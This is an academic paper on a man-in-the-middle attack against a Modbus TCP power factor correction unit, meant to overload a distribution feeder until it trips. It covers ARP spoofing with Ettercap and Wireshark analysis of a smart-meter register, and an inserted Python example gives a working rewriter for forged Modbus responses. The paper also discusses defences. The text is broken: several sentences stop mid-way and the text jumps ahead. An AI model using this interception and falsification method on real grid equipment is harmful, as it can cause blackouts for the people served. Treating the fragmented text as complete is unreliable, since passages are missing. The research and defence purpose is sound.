Demonstration of Man in the Middle Attack on a Feeder Power Factor Correction Unit

Cyber security of distribution power systems is of increasing and pressing importance due to the fast modernisation of current systems. Cyber attacks on distribution power systems may aim to operate the system inefficiently, steal private smart meter data or cause intentional false tripping of a few or all feeders. In this paper, a Man in The Middle (MiTM) attack on a power factor correction unit is implemented and demonstrated to overload a distribution feeder and cause intentional false tripping of the entire feeder, resulting in a regional blackout. The attack is implemented experimentally in a laboratory-scale setup using commercial power equipment under different loading conditions to demonstrate its effectiveness.

, where the attacker interrupts or sniffs the communication between a controller and the field devices or the Supervisory Control and Data Acquisition (SCADA) system. MiTM attacks can be deployed either to change the information exchanged over the Modbus TCP communication channel or, in the passive reconnaissance scenario, to record and read the exchanged messages.
Countermeasures applied to secure the communication against such attacks are based on enhancing the security features of the communication protocols themselves. For instance, the authors in [10] improved Modbus protocol security by changing the packet format to add encryption and hash-based integrity checks such as SHA-2. Another solution is the deployment of authenticated or encrypted protocols for industrial control systems instead of open protocols, which makes initiating such attacks a more challenging task. One protocol used to replace traditional Modbus is DNP3 with Secure Authentication (DNP3-SA) [11], which adds per-message authentication (it does not by itself encrypt the payload) and hardens the protocol against well-known intrusion methods. However, in the smart grid framework there are many deployments where these countermeasures have not yet been applied; hence much smart IIoT-enabled equipment (e.g., smart inverters from Fronius, SMA, etc. that support only Modbus) relies solely on open, unauthenticated protocols.
Significant research work has been carried out on the cyber security of transmission power grids due to the powerful impact of cyber attacks on such grids and the possibility of cascading failure in the worst case [12]-[14]. However, the cyber security of distribution power grids has attracted less attention in the literature, as attacks on such systems do not pose a direct threat to system stability, despite the wide spread of these grids and the possibility of targeted attacks against specific critical loads/feeders. Cyber attacks on distribution power systems may target smart meters, demand side management systems [15], distributed generation control systems, etc. In [16], a false data injection attack (FDIA) is performed on a centralised voltage control system of a distribution system, aiming to cause an undesirable overvoltage or undervoltage. The authors of [17] proposed an FDIA against distribution system state estimation. Such attacks, if not detected, may result in uneconomical operation of the system, operation of the targeted distribution system outside the standard limits or, in the worst case, tripping of the distribution system. An attack against the smart metering infrastructure is proposed in [18] to mislead the Volt-VAr control system of a distribution system, aiming to cause overvoltage or undervoltage conditions. An optimal Volt-VAr optimisation system with FDIA mitigation capability is proposed in [19]. The authors in [20] proposed a neural network-based approach to detect FDIAs on distribution system optimal power flow. The authors of [21] demonstrated several attacks on measurement devices and solar photovoltaic (PV) inverters in a simulation environment.
In this paper, a MiTM attack on a reactive power compensation unit is demonstrated, aiming to overload the targeted feeder and cause intentional false tripping of the feeder (regional blackout) without having direct access to the feeder circuit breaker. In contrast to the theoretical studies in the literature, the attack is designed and implemented on actual devices in a laboratory-scale setup under two different loading conditions to demonstrate its effectiveness.
The rest of the paper is organized as follows. The targeted system is presented in Section II. The implemented MiTM attack is described in Section III and demonstrated on an experimental setup in Section IV. Finally, the paper is concluded in Section V.

II. SYSTEM DESCRIPTION
Reactive power compensation devices are typically installed at the feeder point of common coupling (PCC) in order to support the system voltage and reduce the reactive power flow between the grid and the feeder. As a result, energy losses are reduced and the utilisation of existing grid capacity can be maximised [22]. Dynamic reactive power compensators such as DSTATCOM [23] have the advantage over fixed capacitors of compensating reactive power dynamically under various feeder loading and operating conditions. Similarly, inverter-interfaced distributed generation units, such as solar PV inverters, can play the DSTATCOM role [24], thanks to the multi-functional capabilities of smart inverters [25].
A DSTATCOM is operated in one of three control modes: reactive power control mode, voltage control mode and power factor control mode. In the first mode, the DSTATCOM supplies/consumes a fixed reactive power set by the distribution system operator (DSO). In the second mode, voltage control mode, the DSTATCOM provides reactive power compensation (Q_comp) as a function of the PCC voltage magnitude (V), typically with a linear relation between Q_comp and the PCC voltage, i.e. a Q-V droop. In the third mode, power factor control mode, the DSTATCOM is controlled to generate/consume reactive power such that a constant power factor is maintained at the feeder PCC. Unity power factor operation is a common control setting that ensures reactive power neutralisation of the feeder, where the DSTATCOM generates/consumes reactive power equal in magnitude to the feeder consumption/generation of reactive power. Power factor control mode is used in this paper, with a unity power factor reference. The DSTATCOM system is called a power factor correction (PFC) unit in this paper, as a similar attack can be performed on any inverter-interfaced compensator.
A typical power factor correction unit connected to a feeder PCC is shown in Fig. 1. A smart meter measures the feeder reactive power, Q_feeder, which is communicated through the communication network to the PFC controller. A reactive power reference command, Q_ref, is then sent from the PFC controller to the inverter controller. The PFC is based on a simple proportional (P) controller that ensures unity power factor by compensating the feeder reactive power consumption while respecting the operational limits of the DSTATCOM inverter. This drives the reactive power flow from the grid, Q_grid = Q_comp + Q_feeder, towards zero. The feeder is protected by a circuit breaker that trips the feeder under abnormal conditions such as overloading and short-circuits.
The measurements and control set-points are communicated through a Local Area Network (LAN). Information is transmitted via the Modbus TCP protocol in a client-server configuration, both between the smart meter and the PFC controller and between the PFC controller and the inverter controller. The PFC controller generates set-point commands for regulating the reactive power injected by the inverter. This is achieved through the inverter's Modbus interface, where the PFC controller (a) writes the Modbus holding register that activates the constant reactive power control mode of the inverter and (b) writes, in every control loop, the reactive power set-point to the corresponding holding register of the interface [26]. Standard Modbus TCP on port 502 is used for the read and write commands; the protocol carries no encryption or authentication, so the register values exchanged on the network travel as plain hexadecimal bytes that any host in the path can read or alter.

III. IMPLEMENTED ATTACK
The threat model of this work assumes that the attacker is able to take control of a workstation that has direct access to, and is located in, the LAN of the grid setup. Moreover, an insider attack is considered, where the attacker knows the credentials and logins required for that workstation. Thus, the access can be either physical or remote, using a Virtual Private Network (VPN) or other tools. Having access, on this

The aim of the implemented attack is to create an abnormal operating condition that trips the feeder without any cyber or physical access to the feeder circuit breaker. This is done by interfering with the feeder reactive power measurement Q_feeder transmitted to the PFC controller and replacing it with a false value Q̃_feeder, such that the PFC inverter supplies/consumes a reactive power Q_comp which, instead of compensating the feeder reactive power, amplifies the total reactive power. Thus, the PFC reactive power (Q_comp), together with the actual feeder load (S_feeder = P_feeder + jQ_feeder), creates an overloading condition of the feeder at the PCC, which subsequently leads the feeder breaker to trip the feeder. The procedure for performing this attack on the communication layer is described as follows.
In order to perform the attack in the lab setup, two software tools are used, Wireshark [27] and Ettercap [28]. Ettercap is a security tool for implementing MiTM attacks in a LAN using the common Address Resolution Protocol (ARP) spoofing technique and for filtering the intercepted traffic; Wireshark is used to capture and analyse the intercepted packets. The overall procedure consists of three steps. In the first step, the attacker performs ARP spoofing so that it can monitor the traffic exchanged between the feeder smart meter and the PFC controller, Fig. 1. As the attacker has access to the LAN, ARP spoofing can be performed: the attacker sends forged ARP replies to both hosts so that each of them associates the IP address of the other with the MAC address of the attacker. This causes any traffic between sender and receiver to be sent to the attacker instead. In this work, this step is implemented via Ettercap, and hence the channel between the smart meter and the PFC controller is successfully interposed. Data traffic is recorded by the attacker and forwarded to the controller without any modification of its content. The communication flow after this step is shown in Fig. 2(i).
In the second step, the captured packets are recorded and analysed by the attacker in order to locate the targeted measurement, which in this case is the feeder reactive power Q_feeder. A Modbus TCP packet consists of the following fields: transaction ID, protocol ID, length, unit identifier, function code and data. The Q_feeder measurement is part of the data field and thus the analysis focuses on this part of the packet. For the specific smart meter used in this demonstration, the Modbus register that holds this value is register 7049. Since a Modbus read response carries only the function code, byte count and register values, the response has to be matched with the request that named register 7049 (the transaction ID is the same in both) to know which data bytes hold Q_feeder. The attacker's goal at this stage is not only to derive the hexadecimal representation of the targeted measurement but also to cover the range of possible values that the register may hold. Packet extraction and analysis for this part of the attack were carried out with Wireshark.
The final step of the attack, after recording and analysing the packet pattern, is to filter the packet stream, i.e. to capture the packets and manipulate them to a specific false value Q̃_feeder. Filter injection is a feature of Ettercap; an attack.filter file was therefore written using if, search and replace commands to replace a range of values of the targeted measurement, and compiled with etterfilter. With the compiled filter loaded in Ettercap, the value in every response to a read of the Q_feeder register is replaced with the invalid attacked value Q̃_feeder. During the attack, while the filter is loaded, the measurement values are changed and the controller reads the interfered values, as shown in Fig. 2(ii).
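As an added example of the register rewrite that the three steps above end with (this is not the paper's code nor Ettercap's filter, which works on raw bytes inside Ettercap), the following Python models the application-layer part of step 3. The register number 7049 is from the paper; the encoding of Q_feeder as a single 16-bit signed register in VAr, and the frames built inline, are assumptions. It also shows why the response must be matched to its request by transaction ID: a blind byte-for-byte replace of the value, which is what a plain search/replace filter does, also rewrites any other field that happens to hold the same two bytes, here the transaction ID.

```python
"""Modbus TCP register rewrite, modelling the attack's third step.

Added example (not the paper's code or Ettercap's). Frames are constructed
inline; register 7049 is from the paper, while the encoding of Q_feeder as
one 16-bit signed register in VAr is an assumption.
"""
import struct

MBAP = struct.Struct(">HHHB")    # transaction id, protocol id, length, unit id
READ_HOLDING = 0x03
TARGET_REGISTER = 7049           # holds Q_feeder on the smart meter (paper)


def parse_mbap(frame):
    """Split a Modbus TCP frame into (transaction id, unit id, PDU)."""
    tid, pid, length, uid = MBAP.unpack_from(frame, 0)
    if pid != 0 or length != len(frame) - 6:
        raise ValueError("not a well-formed Modbus TCP frame")
    return tid, uid, frame[7:]


def build_request(tid, uid, start, count):
    """Read Holding Registers request (function code 0x03)."""
    pdu = struct.pack(">BHH", READ_HOLDING, start, count)
    return MBAP.pack(tid, 0, len(pdu) + 1, uid) + pdu


def build_response(tid, uid, values):
    """Read Holding Registers response carrying 16-bit signed values."""
    data = b"".join(struct.pack(">h", v) for v in values)
    pdu = struct.pack(">BB", READ_HOLDING, len(data)) + data
    return MBAP.pack(tid, 0, len(pdu) + 1, uid) + pdu


def register_value(frame, start, register):
    """Decode one register from a response to a read that began at `start`."""
    _, _, pdu = parse_mbap(frame)
    return struct.unpack_from(">h", pdu, 2 + 2 * (register - start))[0]


class RegisterRewriter:
    """Rewrites one register in server->client responses.

    A read response carries no register address, so requests are remembered
    by transaction id and a response is rewritten only when the matching
    request covered the target register.
    """

    def __init__(self, register, false_value):
        self.register = register
        self.false_value = false_value
        self.pending = {}          # transaction id -> (start, count)
        self.rewritten = 0

    def on_client_frame(self, frame):
        tid, _, pdu = parse_mbap(frame)
        if len(pdu) == 5 and pdu[0] == READ_HOLDING:
            self.pending[tid] = struct.unpack(">HH", pdu[1:5])
        return frame               # requests pass through untouched

    def on_server_frame(self, frame):
        tid, _, pdu = parse_mbap(frame)
        request = self.pending.pop(tid, None)
        if request is None or len(pdu) < 2 or pdu[0] != READ_HOLDING:
            return frame           # unmatched, or an exception response
        start, count = request
        if not start <= self.register < start + count:
            return frame
        data = bytearray(pdu)
        struct.pack_into(">h", data, 2 + 2 * (self.register - start), self.false_value)
        self.rewritten += 1
        return frame[:7] + bytes(data)


def demo(true_q=1290, false_q=-2800):
    """Constructed poll of register 7049 whose transaction id, 0x050A, is also
    the big-endian encoding of 1290: a blind byte replace hits the header too."""
    rewriter = RegisterRewriter(TARGET_REGISTER, false_q)
    request = build_request(0x050A, 1, TARGET_REGISTER, 1)
    response = build_response(0x050A, 1, [true_q])
    rewriter.on_client_frame(request)
    forged = rewriter.on_server_frame(response)
    blind = response.replace(struct.pack(">h", true_q), struct.pack(">h", false_q))
    return {
        "true_value": register_value(response, TARGET_REGISTER, TARGET_REGISTER),
        "forged_value": register_value(forged, TARGET_REGISTER, TARGET_REGISTER),
        "forged_tid": parse_mbap(forged)[0],
        "blind_tid": parse_mbap(blind)[0],
    }


if __name__ == "__main__":
    print(demo())
```

In the live attack Ettercap performs the replacement on the intercepted TCP segment and recomputes the checksums; keeping the replacement the same length, as above, avoids disturbing the TCP sequence numbers. A Modbus client that checks the response transaction ID against its outstanding request would drop the blindly rewritten frame but accept the matched one, which is why the rewrite has to be scoped by request rather than by byte pattern.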

IV. RESULTS AND DISCUSSION
The laboratory-scale experimental setup of Fig. 3 is used to demonstrate the implemented attack on a PFC unit. A three-phase variable load represents the feeder demand. A commercial 5 kVA three-phase inverter (Fronius Symo 5.0-3-M) is used as the feeder power factor correction unit, with the maximum reactive power compensation limited to 3 kVAr. A Lumel ND10 serves as the feeder smart meter and communicates Q_feeder over the laboratory LAN. The PFC controller is implemented digitally on a personal computer with a sample time of 2 s. For the purpose of this experiment, the grid power is measured by another three-phase smart meter, a Janitza UMG 604. The maximum capacity of the feeder is assumed to be 5 kVA. Exceeding this limit for a certain time creates an overloading condition that trips the protection relay and isolates the feeder. It is noteworthy that the feeder circuit breaker is not connected to the communication layer, as is the case in practice. Isolating the circuit breaker from the communication network provides additional security against direct attacks on the feeder. Two cases, a successful and an unsuccessful attack, are demonstrated in this section.

A. Case 1: Successful attack
In this case, the feeder is loaded to 75% of the maximum feeder capacity (S_max) before initiating the attack, as shown in Fig. 4. Before launching the attack, the reactive power consumed by the feeder, Q_feeder = 1290 VAr, is compensated by the power factor correction unit (Q_comp), and the reactive power consumed from the grid, Q_grid, is close to zero.
At t = 30 s, the implemented attack is launched as explained in Section III. While the actual reactive power consumed by the feeder, Q_feeder, remained almost the same as before initiating the attack, the attacker injected a false
It can be observed from Fig. 4 that following the attack at t = 30 s the apparent power drawn by the feeder exceeds the maximum capacity of the feeder, S_max. Therefore, a tripping signal is initiated at t = 90 s and the entire feeder is tripped. Hence, the attack results in abnormal amplification (instead of compensation) of the feeder reactive power, which indirectly overloads the feeder and leads to a regional blackout of the feeder.
While the presented attack is implemented on a laboratory setup with a single inverter, a realistic scenario may deploy a similar attack on multiple inverters in the feeder to create a greater impact and increase the risk of taking the feeder out of service.

B. Case 2: Unsuccessful attack
In this case, the feeder is lightly loaded, as shown in Fig. 5. The reactive power consumed by the feeder is Q_feeder = 700 VAr, which is compensated accordingly by the inverter before the attack is launched at t = 30 s. As in Case 1, the measured feeder reactive power is replaced by a false reactive power signal, Q̃_feeder = 2800 VAr, which causes the inverter to react by consuming a similar amount of reactive power. The feeder total apparent power therefore increases, but stays below the maximum limit of the feeder, S_max, owing to the light loading of the feeder. Consequently, the feeder does not trip, as S_grid < S_max, and the attack is unsuccessful since the attacked feeder is not overloaded.
It can be observed from Case 1 and Case 2 that two factors determine the effectiveness of the attack. The first is the loading condition of the feeder: a heavily loaded feeder is more likely to be falsely tripped under this attack. The second is the capacity of the attacked PFC unit: a higher-capacity PFC unit can inject more reactive power and therefore makes the attack more effective.
V. CONCLUSION
In this paper, a man in the middle attack on a feeder power factor correction unit is implemented and demonstrated in a laboratory-scale setup using a commercial inverter. The aim of the attack was to trip the targeted feeder indirectly (causing a regional blackout) without having remote access to the feeder circuit breaker. In the demonstrated attack, the attacker takes advantage of the smart meter measurement being communicated over a local area network, intercepts this measurement and injects the desired false measurement data instead. The demonstration of this attack on an experimental setup revealed its effectiveness and the damage that it may cause.
Defensive mechanisms against the presented attack may include authenticating or encrypting the measurement communication (e.g. DNP3-SA, or the TLS-based Modbus/TCP Security profile instead of plain Modbus TCP on port 502), blocking the ARP spoofing step itself (static ARP entries or dynamic ARP inspection on the LAN switches), and strengthening the network security, e.g. firewalls, communication network segmentation, etc. A plausibility check in the PFC controller, such as rejecting a Q_feeder reading that jumps by more than is physically possible between two 2 s samples or that would drive the inverter straight to its reactive power limit, would further limit the impact. The presented work, being implemented on commercial equipment, highlights the potential vulnerabilities in current industrial practice and the importance of implementing such defensive mechanisms.
Future work may include increasing the scalability and impact of this attack and proposing intrusion detection schemes to avoid the false tripping of the feeder.

VI. ACKNOWLEDGEMENT
This work is supported by the European Regional Development